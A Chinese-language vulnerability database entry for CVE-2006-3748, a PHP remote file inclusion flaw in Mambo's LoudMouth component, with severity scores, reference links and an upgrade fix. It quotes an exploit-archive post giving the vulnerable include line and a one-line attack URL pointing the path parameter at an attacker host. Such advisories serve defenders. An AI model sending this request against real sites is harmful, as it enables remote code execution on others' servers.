CVE-2006-3748
CVSS6.8
发布时间 :2006-07-21 10:03:00
修订时间 :2011-03-07 21:39:24
NMCOE    

[原文]PHP remote file inclusion vulnerability in includes/abbc/abbc.class.php in the LoudMouth Component for Mambo 4.0j, and possibly other versions including 4.1, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.


[CNNVD]Mambo LoudMouth 模块 'ABBC.Class.PHP'的远程文件包含漏洞(CNNVD-200607-349)

        Mambo 4.0j以及包括4.1版本的可能的其他版本的LoudMouth Component 中的includes/abbc/abbc.class.php存在PHP远程文件包含漏洞。远程攻击者可以借助mosConfig_absolute_path参数中的URL,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3748
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3748
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-349
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27772
(UNKNOWN)  XF  loudmouth-class-file-include(27772)
http://www.vupen.com/english/advisories/2006/2844
(UNKNOWN)  VUPEN  ADV-2006-2844
http://www.securityfocus.com/bid/19044
(UNKNOWN)  BID  19044
http://secunia.com/advisories/21077
(VENDOR_ADVISORY)  SECUNIA  21077
http://milw0rm.com/exploits/2023
(UNKNOWN)  MILW0RM  2023

- 漏洞信息

Mambo LoudMouth 模块 'ABBC.Class.PHP'的远程文件包含漏洞
中危 代码注入
2006-07-21 00:00:00 2007-10-01 00:00:00
远程  
        Mambo 4.0j以及包括4.1版本的可能的其他版本的LoudMouth Component 中的includes/abbc/abbc.class.php存在PHP远程文件包含漏洞。远程攻击者可以借助mosConfig_absolute_path参数中的URL,执行任意PHP代码。

- 公告与补丁

        

- 漏洞信息 (2023)

com_loudmouth Mambo Component <= 4.0j Include Vulnerability (EDBID:2023)
php webapps
2006-07-17 Verified
0 h4ntu
N/A [点击下载]
Bug Found by h4ntu [http://h4ntu.com]  #batamhacker crew
Another Mambo component remote inclusion vulneribility
 
download : http://mamboxchange.com/frs/download.php/7911/com_loudmouth-4.0j.zip

bug found in file abbc.class.php :

include( $GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/abbc/abbc.config.php');

http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]
 
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink

# milw0rm.com [2006-07-17]
		

- 漏洞信息

27430
LoudMouth for Mambo/Joomla (com_loudmouth) abbc.class.php mosConfig_absolute_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2006-07-17 Unknow
2006-07-17 Unknow

- 解决方案

Upgrade to version 4.1 Security Patch 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站